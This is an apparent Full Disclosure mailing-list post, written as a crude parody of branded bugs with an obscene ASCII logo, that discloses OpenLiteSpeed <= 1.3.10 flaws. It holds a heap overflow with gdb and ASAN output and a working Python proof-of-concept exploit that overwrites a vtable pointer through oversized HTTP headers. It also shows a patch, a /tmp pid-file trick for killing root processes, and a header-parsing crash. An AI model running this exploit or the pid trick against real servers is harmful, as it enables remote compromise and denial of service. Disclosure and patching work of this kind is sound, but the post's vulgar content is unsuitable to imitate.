[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Multiple Vulnerabilities in Openlitespeed <= 1.3.10 - CVE-b045-73d a.k.a. Analbleed.



This is an irresponsible disclosure of the vulnerability, which will bring

large parts of the Internet into its knees - CVE-b045-73d a.k.a Analbleed.

Obviously you can find the fancy logo for it below (officially approved by

the security community and industry worldwide). You can also listen to the

O.S.T. on the vuln's official website free of charge (as for now) here at

http://analbleed.com. If you are interested in purchasing t-shirts, cups,

stickers etc. visit our on-line shop on the same page. Special offer

includes also a vademecum treating about all logo branded vulns released so

far. You can now focus on studying their names, logos and more instead of

actually doing your own research.

Knowing life the logo formatting will break;P But not to worry my friend. Visit

the official web page to please your eyes with it.</rant>


http://en.wikipedia.org/wiki/LiteSpeed_Technologies_Inc.: May 2013 : It is

used by 2% of all websites according to W3Techs,[9] making it the 4th most

popular web servers.


Yup, whatever. Please, think of the kittens -

http://en.wikipedia.org/wiki/Every_time_you_masturbate..._God_kills_a_kitten



Ok, here comes the Analbleed pain...



                                                         +`

                                                       `+++,

                                                      .+++++:

                                                     :+++++++'

                                                    ++++++++++'

                                                   +++++++++++++

                                                  +++++++++++++++

                                                 +++++++++++++++++

                                                +++++++++++++++++++

                                               +++++++++++++++++++++

                                              +++++++++++++++++++++++


+++++++++++++++++++++++++`


`+++++++++++++++++++++++++++,


`+++++++++++++++++++++++++++++.


.+++++++++++++++++++++++++++++++:

                                        :++++++++++++++++
++++++++++++++++:

                                       ;++++++++++++++++
++++++++++++++++;

                                      '++++++++++++++++
++++++++++++++++;

                                     +++++++++++++++++
++++++++++++++++;

                                    +++++++++++++++++
++++++++++++++++'

                                   +++++++++++++++++
'+++++++++++++++'

                                  ++++++++++++++++'
'+++++++++++++++'

                                 ++++++++++++++++:
:+++++++++++++++'

                               `++++++++++++++++,
,++++++++++++++++

                              `++++++++++++++++`
`++++++++++++++++

                             ,++++++++++++++++
++++++++++++++++

                            ,++++++++++++++++         `,,`
++++++++++++++++

                           ,++++++++++++++++        :++++++'
++++++++++++++++

                          ,++++++++++++++++        ++++++++++`
 ++++++++++++++++

                         :++++++++++++++++        +++++++++++'
  ++++++++++++++++

                        ,++++++++++++++++        ,++++++++++++.
   ++++++++++++++++

                       ,++++++++++++++++         +++++++++++++:
    ++++++++++++++++

                      ,++++++++++++++++         ;+++++++++++++:
     ++++++++++++++++

                     `++++++++++++++++          ++++++++++++++.
      '+++++++++++++++

                    `+++++++++++++++'           +++++++++++++'
       '+++++++++++++++

                    +++++++++++++++'           :+++++++++++++`
        '+++++++++++++++

                   +++++++++++++++'            ++++++++++++:
         '+++++++++++++++

                  +++++++++++++++'             ++++++++++`
          '+++++++++++++++

                 +++++++++++++++'              ++++++++++
           '+++++++++++++++

                +++++++++++++++'               ++++++++++
            '+++++++++++++++

               '++++++++++++++'               `++++++++++
             '+++++++++++++++

              :+++++++++++++++                ,+++++++++;
              '++++++++++++++:

             `+++++++++++++++                 ;+++++++++.
               +++++++++++++++`

             +++++++++++++++                  '+++++++++`
                +++++++++++++++

            +++++++++++++++                   '+++++++++`
                 +++++++++++++++

           '++++++++++++++                    ++++++++++
                  +++++++++++++++

          .++++++++++++++                     ++++++++++
                   ++++++++++++++.

          ++++++++++++++`                     ++++++++++
                    ++++++++++++++

         ++++++++++++++:                      ++++++++++
                    ,++++++++++++++

        .+++++++++++++'                       ++++++++++
                     '+++++++++++++,

        ++++++++++++++                        ++++++++++
                      ++++++++++++++

       '+++++++++++++                         ++++++++++
                       ++++++++++++++

       +++++++++++++`                         ++++++++++`
                        +++++++++++++

      +++++++++++++'                          '+++++++++`
                        '+++++++++++++

      +++++++++++++                           '+++++++++`
                         +++++++++++++`

     +++++++++++++                            ;+++++++++.
                          +++++++++++++

     ++++++++++++'                            ,+++++++++,
                          '++++++++++++

    +++++++++++++                             `+++++++++;
                           +++++++++++++

    ++++++++++++,                             `++++++++++
                           ,++++++++++++

   `++++++++++++                               ++++++++++
                            ++++++++++++,

   ++++++++++++,                               ++++++++++
                            .++++++++++++

   ++++++++++++                                ++++++++++
                             ++++++++++++

   +++++++++++'                                ++++++++++`
                             '+++++++++++

  .+++++++++++                                 '+++++++++:
                              +++++++++++.

  ;+++++++++++                                 .++++++++++
                              +++++++++++;

  ++++++++++++                                  ++++++++++
                              ++++++++++++

  ++++++++++++                                  ++++++++++
                              ++++++++++++

  +++++++++++;                                  ++++++++++.
                              ;+++++++++++

  +++++++++++,                                  '+++++++++'
                              ,+++++++++++

  +++++++++++,                                  .++++++++++
                              .+++++++++++

  +++++++++++.                                   ++++++++++
                              .+++++++++++

  +++++++++++.                                   ++++++++++'
                              .+++++++++++

  +++++++++++,                                   ;++++++++++
                              .+++++++++++

  +++++++++++;                                   `+++++++++++
                              :+++++++++++

  ++++++++++++                                    ++++++++++++
                              ++++++++++++

  ++++++++++++                                    '+++++++++++,
                              ++++++++++++

  ;+++++++++++                                     ++++++++++++
                              +++++++++++;

  .+++++++++++                                     +++++++++++++
                              +++++++++++.

   +++++++++++'                                   +++++++++++++++
                             '+++++++++++

   ++++++++++++                                  +++++++++++++++++
                             ++++++++++++

   ++++++++++++:                                +++++++++++++++++++
                            ,++++++++++++

   `++++++++++++                               +++++++++++++++++++++
                            ++++++++++++.

    +++++++++++++                            .+++++++++++++++++++++++,
                           +++++++++++++

    '++++++++++++'
'+++++++++++++++++++++++++'                          '+++++++++++++

     ++++++++++++++
+++++++++++++++++++++++++++++                        '+++++++++++++

     +++++++++++++++
'++++++++++++++++++++++++++++++++                     +++++++++++++++

      ++++++++++++++++
'+++++++++++++++++++++++++++++++++++'                 '+++++++++++++++

      '+++++++++++++++++`
`++++++++++++++++++++`++++++++++++++++++++.
`+++++++++++++++++'

       ++++++++++++++++++++',...,+++++++++++++++++++++++
+++++++++++++++++++++++,...,'++++++++++++++++++++

        +++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++

        `+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++.

         ,+++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++:

          ,++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++,

            +++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++`

             ++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++

              ,++++++++++++++++++++++++++++++++++++++
+++++++;+++++++++++++++++++++++++++++++,

                ;+++++++++++++++++++++++++++'++++++++        +++++++
'+++++++++++++++++++++++++++;

                  :+++++++++++++++++++++++:  ++++++++        +++++++
 :+++++++++++++++++++++++:

                     '+++++++++++++++++++    ++++++++        +++++++
    '+++++++++++++++++'

                        .;+++++++++;` +++    ++++++++        +++++++
       `;+++++++++'.

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                      +++    ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             ++++++++        +++++++
          +++

                                             +++++++         +++++++
          +++

                                              ++++++         +++++++
          +++

                                                +            +++++++
          +++

                                                             +++++++
          +++

                                                             +++++++
          +++

                                                             +++++++
          +++

                                                             +++++++
          ++

                                                             +++++++

                                                             +++++++

                                                             +++++++

                                                             +++++++

                                                             +++++++

                                                              ++++++

                                                              ++++++

                                                               ++++


Bigger the better. Don't you think?



source:

=======

int Appender::append(LoggingEvent *pEvent)

{

    char achBuf[9000];

    char *pMessage = achBuf;

    int len;

    if (!pEvent)

        return -1;

    Layout *pLayout;

    if (pEvent->m_pLayout)

        pLayout = pEvent->m_pLayout;

    else

        pLayout = m_pLayout;        ; this path is taken, m_pLayout is
on overwritten heap

    if (pLayout)

        len = pLayout->format(pEvent, pMessage, sizeof(achBuf));    ;
SIGSEGV here

    else

    {

        pMessage = (char *)pEvent->m_pMessageBuf;

        len = pEvent->m_iMessageLen;

    }

    return append(pMessage, len);

}



gdb (aftermath):

================

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]

RAX: 0x0

RBX: 0x7df6f0 --> 0x4f61d0 --> 0x4b9480
(<log4cxx::FileAppender::~FileAppender()>:  mov    QWORD PTR
[rdi],0x4df2b0)

RCX: 0x2328 ('(#')

RDX: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE]
[127.0.0.1:34844] Http request header is too big, abandon!\n")

RSI: 0x7fffffffc390 --> 0x1388

RDI: 0x77f660 ('!' <repeats 200 times>...)

RBP: 0x7df780 --> 0x4f6110 --> 0x4b90b0 (<log4cxx::Logger::~Logger()>:
 mov    QWORD PTR [rdi],0x4df2b0)

RSP: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE]
[127.0.0.1:34844] Http request header is too big, abandon!\n")

RIP: 0x4b8c37 (<log4cxx::Appender::append(log4cxx::LoggingEvent*)+55>:
 call   QWORD PTR [r8+0x18])

R8 : 0x2121212121212121 ('!!!!!!!!')

R9 : 0x1

R10: 0x552cf656

R11: 0x0

R12: 0x1388

R13: 0x0

R14: 0x7742c0 --> 0x7e4530 --> 0x54534f5000000000 ('')

R15: 0x1

EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT
direction overflow)

0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63

63          len = pLayout->format(pEvent, pMessage, sizeof(achBuf));


gdb-peda$ bt

#0  0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63

#1  0x00000000004b8fe8 in log4cxx::Logger::vlog (this=0x7df780,
level=level@entry=0x1388,

    format=format@entry=0x4e5310 "[%s] Http request header is too big,
abandon!", args=args@entry=0x7fffffffe418,
no_linefeed=no_linefeed@entry=0x0)

    at logger.cpp:111

#2  0x0000000000463876 in vnotice (args=0x7fffffffe418,
format=<optimized out>, this=<optimized out>) at
../../src/log4cxx/logger.h:106

#3  HttpLog::notice (pLogger=<optimized out>, fmt=fmt@entry=0x4e5310
"[%s] Http request header is too big, abandon!") at httplog.cpp:381

#4  0x000000000047e1f4 in HttpSession::readToHeaderBuf
(this=this@entry=0x774280) at httpsession.cpp:638

#5  0x000000000048422b in HttpSession::onReadEx (this=0x774280) at
httpsession.cpp:1645

#6  0x0000000000474205 in NtwkIOLink::handleEvents (this=0x778a10,
evt=<optimized out>) at ntwkiolink.cpp:310

#7  0x00000000004c4ccc in epoll::waitAndProcessEvents (this=0x7923f0,
iTimeoutMilliSec=<optimized out>) at epoll.cpp:190

#8  0x0000000000469de2 in EventDispatcher::run
(this=this@entry=0x7795c8) at eventdispatcher.cpp:219

#9  0x0000000000451450 in HttpServerImpl::start (this=0x7795a0) at
httpserver.cpp:406

#10 0x0000000000457ca9 in HttpServer::start (this=<optimized out>) at
httpserver.cpp:3216

#11 0x000000000044a700 in LshttpdMain::main (this=this@entry=0x779350,
argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at
lshttpdmain.cpp:930

#12 0x000000000044a672 in main (argc=argc@entry=0x1,
argv=argv@entry=0x7fffffffe758) at main.cpp:109

#13 0x00007ffff5cc9ec5 in __libc_start_main (main=0x44a640 <main(int,
char**)>, argc=0x1, argv=0x7fffffffe758, init=<optimized out>,
fini=<optimized out>,

    rtld_fini=<optimized out>, stack_end=0x7fffffffe748) at libc-start.c:287

#14 0x000000000044be52 in _start ()


gdb-peda$ disas

Dump of assembler code for function
log4cxx::Appender::append(log4cxx::LoggingEvent*):

   0x00000000004b8c00 <+0>: push   rbx

   0x00000000004b8c01 <+1>: sub    rsp,0x2330

   0x00000000004b8c08 <+8>: mov    rax,QWORD PTR fs:0x28

   0x00000000004b8c11 <+17>:    mov    QWORD PTR [rsp+0x2328],rax

   0x00000000004b8c19 <+25>:    xor    eax,eax

   0x00000000004b8c1b <+27>:    test   rsi,rsi

   0x00000000004b8c1e <+30>:    je     0x4b8c82
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+130>

   0x00000000004b8c20 <+32>:    mov    rbx,rdi

   0x00000000004b8c23 <+35>:    mov    rdi,QWORD PTR [rsi+0x20];
0x7fffffffc390 + 0x20 = 0x7fffffffc3b0 = 0x0 ?!?!?

   0x00000000004b8c27 <+39>:    test   rdi,rdi

   0x00000000004b8c2a <+42>:    je     0x4b8c70
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+112>

   0x00000000004b8c2c <+44>:    mov    r8,QWORD PTR [rdi]   ; 0x77f660
-> '!' <repeats 200 times>...

   0x00000000004b8c2f <+47>:    mov    ecx,0x2328

   0x00000000004b8c34 <+52>:    mov    rdx,rsp

=> 0x00000000004b8c37 <+55>:    call   QWORD PTR [r8+0x18]  ; SIGSEGV
on $r8 + 0x18 = 0x2121212121212139

   0x00000000004b8c3b <+59>:    mov    rcx,rsp

   0x00000000004b8c3e <+62>:    mov    edx,eax

   0x00000000004b8c40 <+64>:    mov    r8,QWORD PTR [rbx]

   0x00000000004b8c43 <+67>:    mov    rsi,rcx

   0x00000000004b8c46 <+70>:    mov    rdi,rbx

   0x00000000004b8c49 <+73>:    call   QWORD PTR [r8+0x38]

   0x00000000004b8c4d <+77>:    mov    rcx,QWORD PTR [rsp+0x2328]

   0x00000000004b8c55 <+85>:    xor    rcx,QWORD PTR fs:0x28

   0x00000000004b8c5e <+94>:    jne    0x4b8c89
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+137>

   0x00000000004b8c60 <+96>:    add    rsp,0x2330

   0x00000000004b8c67 <+103>:   pop    rbx

   0x00000000004b8c68 <+104>:   ret

   0x00000000004b8c69 <+105>:   nop    DWORD PTR [rax+0x0]

   0x00000000004b8c70 <+112>:   mov    rdi,QWORD PTR [rbx+0x18]

   0x00000000004b8c74 <+116>:   test   rdi,rdi

   0x00000000004b8c77 <+119>:   jne    0x4b8c2c
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+44>

   0x00000000004b8c79 <+121>:   mov    rcx,QWORD PTR [rsi+0x10]

   0x00000000004b8c7d <+125>:   mov    edx,DWORD PTR [rsi+0x18]

   0x00000000004b8c80 <+128>:   jmp    0x4b8c40
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+64>

   0x00000000004b8c82 <+130>:   mov    eax,0xffffffff

   0x00000000004b8c87 <+135>:   jmp    0x4b8c4d
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+77>

   0x00000000004b8c89 <+137>:   call   0x449720 <__stack_chk_fail@plt>

End of assembler dump.


gdb-peda$ p *(log4cxx::LoggingEvent*)$rsi

$5 = {

  m_level = 0x1388,

  m_flag = 0x0,

  m_pLoggerName = 0x7df7d4 "Example",

  m_pMessageBuf = 0x7fffffffc3d0 "[127.0.0.1:34846] Http request
header is too big, abandon!",

  m_iMessageLen = 0x3a,

  m_pLayout = 0x0,

  m_timestamp = {

    tv_sec = 0x552cf656,

    tv_usec = 0xa5ec6

  }

}


gdb-peda$ p *pLayout

$5 = {

  <Duplicable> = {

    _vptr.Duplicable = 0x2121212121212121,

    m_sName = {

      <AutoStr> = {

        m_pStr = 0x2121212121212121 <error: Cannot access memory at
address 0x2121212121212121>

      },

      members of AutoStr2:

      m_iStrLen = 0x21212121

    }

  },

  members of log4cxx::Layout:

  m_pUserData = 0x2121212121212121

}



ASAN:

=====

==24207==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x62700000a100 at pc 0x7ffff5c1dd4c bp 0x7fffffffe0d0 sp
0x7fffffffe0a8

WRITE of size 2796 at 0x62700000a100 thread T0

    #0 0x7ffff5c1dd4b in memmove
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x34d4b)

    #1 0x488dda in AutoBuf::appendNoCheck(char const*, int)
(/home/jbieber/ospeed/bin/openlitespeed+0x488dda)

    #2 0x488adb in AccessLog::appendStr(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:652
     // must be <= 4096

    #3 0x48892b in AccessLog::log(HttpSession*)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:627
               // logs referer and user-agent hdrs

    #4 0x4a2de0 in HttpVHost::logAccess(HttpSession*) const
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:354

    #5 0x4bb9ec in HttpSession::logAccess(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:184

    #6 0x4c012e in HttpSession::closeConnection()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1860

    #7 0x4bbce3 in HttpSession::nextRequest()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:266
                 // must be non keep-alive; best use HTTP/1.0

    #8 0x4bf01c in HttpSession::handlerProcess(HttpHandler const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1371

    #9 0x4bea64 in HttpSession::processURI(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1228

    #10 0x4be070 in HttpSession::redirect(char const*, int, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1011

    #11 0x4bf529 in HttpSession::sendHttpError(char const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1536

    #12 0x4c49c9 in HttpSession::httpError(int, char const*)
../../src/http/httpsession.h:287

    #13 0x4bfa62 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1692

    #14 0x4ace2a in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:745

    #15 0x4ab7d5 in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:310

    #16 0x52611c in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.8/src/edio/epoll.cpp:261

    #17 0x49efeb in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.8/src/http/eventdispatcher.cpp:219

    #18 0x4769bc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:406

    #19 0x47e25f in HttpServer::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3216

    #20 0x473dff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:930

    #21 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109

    #22 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

    #23 0x471698 (/home/jbieber/ospeed/bin/openlitespeed+0x471698)


0x62700000a100 is located 0 bytes to the right of 12288-byte region
[0x627000007100,0x62700000a100)

allocated by thread T0 here:

    #0 0x7ffff5c3da96 in __interceptor_realloc
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54a96)

    #1 0x539e51 in AutoBuf::allocate(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:42

    #2 0x539dcd in AutoBuf::AutoBuf(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:26

    #3 0x487f46 in AccessLog::AccessLog()
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:446

    #4 0x4a22a2 in HttpVHost::setAccessLogFile(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:194

    #5 0x486837 in HttpLogSource::initAccessLog(XmlNode const*, long*)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:117

    #6 0x4865d9 in HttpLogSource::initAccessLog(XmlNode const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:69

    #7 0x4a7a76 in HttpVHost::config(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2044

    #8 0x4a8781 in HttpVHost::configVHost(XmlNode const*, char const*,
char const*, char const*, char const*, XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2307

    #9 0x4a8a52 in HttpVHost::configVHost(XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2370

    #10 0x47ca8b in HttpServerImpl::configVHosts(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2227

    #11 0x47db52 in HttpServerImpl::configServer(int, XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2586

    #12 0x47df45 in HttpServerImpl::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2775

    #13 0x47e7f1 in HttpServer::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3415

    #14 0x473354 in LshttpdMain::config()
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:629

    #15 0x473aff in LshttpdMain::init(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:846

    #16 0x473de2 in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:926

    #17 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109

    #18 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)


SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memmove



poc:

====

#!/usr/bin/python


import sys

import struct

import socket


#

# openlitespeed v1.3.10:

#

# Kali:

#  CANARY    : ENABLED

#  FORTIFY   : disabled

#  NX        : ENABLED

#  PIE       : disabled

#  RELRO     : disabled

#

# Ubuntu:

#  CANARY    : ENABLED

#  FORTIFY   : ENABLED

#  NX        : ENABLED

#  PIE       : disabled

#  RELRO     : Partial

#

# 00400000-0052e000 r-xp 00000000 fc:00 323891

# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed

# 0072d000-0072e000 r--p 0012d000 fc:00 323891

# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed

# 0072e000-00735000 rw-p 0012e000 fc:00 323891

# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed

# 00735000-007b0000 rw-p 00000000 00:00 0

# [heap]

# 007b0000-009d7000 rw-p 00000000 00:00 0

# [heap]

# 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0

# [stack]

#

# .data base: 0x00000000007e1100

# .data size: 0x001e1100

#

# for kernel.randomize_va_space=1 one can use .data segment which is

# holding the request

#

# for kernel.randomize_va_space=2 one need to brute-force in order to find

# the address holding our request

#

# final = .data_addr (brute-forced addr, e.g.: 0x8ab8c4) + 0xe32 (offset)

#



def sendnokeepalive(r):

    h = 'localhost'

    p = 8088


    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((h, p))

    s.send(r)

    r = s.recv(4096)

    s.close()


    return s



if __name__ == '__main__':

    daddr = int(sys.argv[1], 16) - 0x18 + 0xe32

    r8_offset_addr = struct.pack('<Q', daddr)

    print(" .data address: 0x%x") % daddr


    gadget = 0x4141414141414141

    final = struct.pack('<Q', gadget)

    print("gadget address: 0x%x") % gadget


    r1 = 'POST /w HTTP/0.9\n\rReferer: t\n\rUser-Agent: f\n\r\n\r'


    r2 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'

    r2 += 'Referer: ' + final + '!' * 3679 + '\n'

    r2 += 'Content-Type: ' + '!' * 3740 + '\n'

    r2 += 'Content-Type: ' + '!' * 3935 + '\n'

    r2 += 'Content-Type: ' + '!' * 4157 + '\n'

    r2 += 'Content-Type: ' + '!' * 4117 + '\n\n'


    r3 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'

    r3 += 'Referer: ' + 'AAAAAAAA' + '!' * 1500

    r3 += r8_offset_addr + '!' * 2171 + '\n'

    r3 += 'Content-Type: ' + '!' * 3740 + '\n'

    r3 += 'Content-Type: ' + '!' * 3935 + '\n'

    r3 += 'Content-Type: ' + '!' * 4157 + '\n'

    r3 += 'Content-Type: ' + '!' * 4117 + '\n\n'


    # XXX: should be 5 or 6 reqs in total, 'while'

    # used for convenience during testing

    while(1):

        sendnokeepalive(r1)

        sendnokeepalive(r2)

        sendnokeepalive(r3)


    sys.exit(0)



patch:

======

--- accesslog.cpp.orig  2015-04-23 23:11:31.265510318 +0200

+++ accesslog.cpp   2015-04-23 23:54:48.921496609 +0200

@@ -643,7 +643,7 @@ int AccessLog::appendStr(const char *pSt

     if (*pStr)

     {

         m_buf.append('"');

-        if ((len > 4096) || (m_buf.capacity() <= len + 2))

+        if ((len > 4096) || (m_buf.capacity() <= len + 2) ||
(m_buf.size() + len) >= LOG_BUF_SIZE)

         {

             flush();

             m_pAppender->append(pStr, len);




bonus features:

===============

#1:


Neither /home/wrecking/ospeed/bin/lswsctrl.open nor make install check the

/tmp/lshttpd/.


-- cut --

$ id

uid=1003(wrecking) gid=1003(ball) groups=1003(ball),4(adm),27(sudo)


$ ls -lah /tmp/lshttpd/

total 15M

drwxr-xr-x  4 wrecking ball 4.0K Apr  1 16:50 .

drwxrwxrwt 12 root  root     15M Apr  1 16:53 ..

drwxr-xr-x  2 wrecking ball 4.0K Mar  6 16:42 bak_core

-rw-r--r--  1 wrecking ball    6 Apr  1 16:50 lshttpd.pid

-rw-r--r--  1 wrecking ball  446 Apr  1 16:18 .rtreport

-rw-r--r--  1 wrecking ball  174 Apr  1 16:17 .status

drwx------ 12 wrecking ball 4.0K Mar 16 12:25 swap


$ sudo nc -l localhost -p 6666 -v &

[1] 25222

$ Listening on [localhost] (family 0, port 6666)


$ ps axuwww | grep local

root     25222  0.0  0.0  73288  2132 pts/0    S+   13:37   0:00 sudo nc -l

localhost -p 6666

root     25223  0.0  0.0  11224   784 pts/0    S+   13:37   0:00 nc -l

localhost -p 6666


$ echo 25222 > /tmp/lshttpd/lshttpd.pid


$ sudo /home/wrecking/ospeed/bin/lswsctrl.open stop

[OK] litespeed: stopped.


$

[1]+  Exit 140                sudo nc -l localhost -p 6666 -v

$

-- cut --



#2:

DoS while processing unknown headers. The poc test case is now >20MB so we

will spare the fd and won't send it;] reading about delta debugging in

progress, sorry.


asan:

==3678==ERROR: AddressSanitizer: SEGV on unknown address
0x61d74683afcc (pc 0x0000004b477c sp 0x7fffd40198e0 bp 0x7fffd4019950
T0)

    #0 0x4b477b in HttpReq::processHeaderLines()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543

    #1 0x4b3990 in HttpReq::processHeader()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:224

    #2 0x4bce44 in HttpSession::readToHeaderBuf()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:614

    #3 0x4bf996 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:1645

    #4 0x4acf54 in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:745

    #5 0x4ab8ff in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:310

    #6 0x527365 in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.10/src/edio/epoll.cpp:190

    #7 0x49f0f7 in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.10/src/http/eventdispatcher.cpp:219

    #8 0x476abc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:406

    #9 0x47e34b in HttpServer::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:3216

    #10 0x473eff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.10/src/main/lshttpdmain.cpp:930

    #11 0x47191f in main /home/jbieber/openlitespeed-1.3.10/src/main.cpp:109

    #12 0x7f78c3e41ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

    #13 0x471798 (/home/jbieber/ospeed/bin/openlitespeed+0x471798)


AddressSanitizer can not provide additional info.

SUMMARY: AddressSanitizer: SEGV
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
HttpReq::processHeaderLines()

==3678==ABORTING


source:

int HttpReq::processHeaderLines()

{

    ...

    key_value_pair *pCurHeader = NULL;

    ...

            else

            {

                pCurHeader = newUnknownHeader();

                eCurHeader->keyOff = pLineBegin - m_headerBuf.begin();

    ...


2.

    key_value_pair *newUnknownHeader()

    {   return newKeyValueBuf(m_headerIdxOff);    }


3.

key_value_pair *HttpReq::newKeyValueBuf(int &idxOff)

{

    char *p = NULL;

    int orgSize;

    int newSize;

    int used;

    if (idxOff == 0)                        // idxOff = m_headerIdxOff = 0x3e4

    {

        orgSize = 0;

        used = 0;

    }

    else

    {

        p = m_reqBuf.getPointer(idxOff);    // m_pBuf + idxOff =
0x61d00000cc64 -> 0x74682e3500000028

        orgSize = *((int *)p);              // 0x28

        used = *(((int *)p) + 1);           // 0x74682e35

    }

    if (used == orgSize)                    // path not taken

        ...

    }

    ++*(((int *)p) + 1);                    // wtf?!

    return (key_value_pair *)(p + sizeof(int) * 2) + used;



gdb:

Breakpoint 1, HttpReq::newKeyValueBuf (this=0x619000014fa0,
idxOff=@0x619000015090: 0x3e4) at httpreq.cpp:723

723              // 0xa

gdb-peda$

